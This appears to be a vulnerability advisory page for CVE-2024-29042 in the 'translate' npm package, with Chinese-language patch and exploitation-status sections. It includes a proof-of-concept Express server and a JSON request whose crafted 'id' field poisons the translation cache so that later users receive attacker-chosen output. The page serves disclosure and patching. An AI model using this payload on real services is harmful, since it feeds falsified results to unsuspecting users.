CVE-2024-29042

描述

### Summary An attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users. ### Details The `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served. ### PoC Take the following simple server allowing users to supply text and the language to translate to. ```javascript import translate from "translate"; import express from 'express'; const app = express(); app.use(express.json()); app.post('/translate', async (req, res) => { const { text, language } = req.body; const result = await translate(text, language); return res.json(result); }); const port = 3000; app.listen(port, () => { console.log(`Server is running on port ${port}`); }); ``` We can send the following request to poison the cache: ``` {"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}} ``` ![Poisoning the cache](https://user-images.githubusercontent.com/44903767/285421743-ccfa3d9d-24cf-47b7-b805-0e4034cec82e.png) Now, any user that attempts to translate "I love you" to Dutch, will get "I hate you" in Dutch as the response. ![The victim gets our poisoned data](https://user-images.githubusercontent.com/44903767/285422033-b3853ca2-8a5a-4875-91e8-ba2ef0258bc6.png) ### Impact An attacker can control the results other users may get

如何修補 CVE-2024-29042

要修補 CVE-2024-29042,請將受影響套件升級到下列已修補版本。

—升級至 3.0.0 或更新版本

CVE-2024-29042 正在被利用嗎?

低 — EPSS 為 1.0%,目前沒有觀察到大規模利用活動。

受影響套件(1)

from 0, < 3.0.0

描述

如何修補 CVE-2024-29042

CVE-2024-29042 正在被利用嗎?

受影響套件(1)

CVSS 分數

參考連結(5)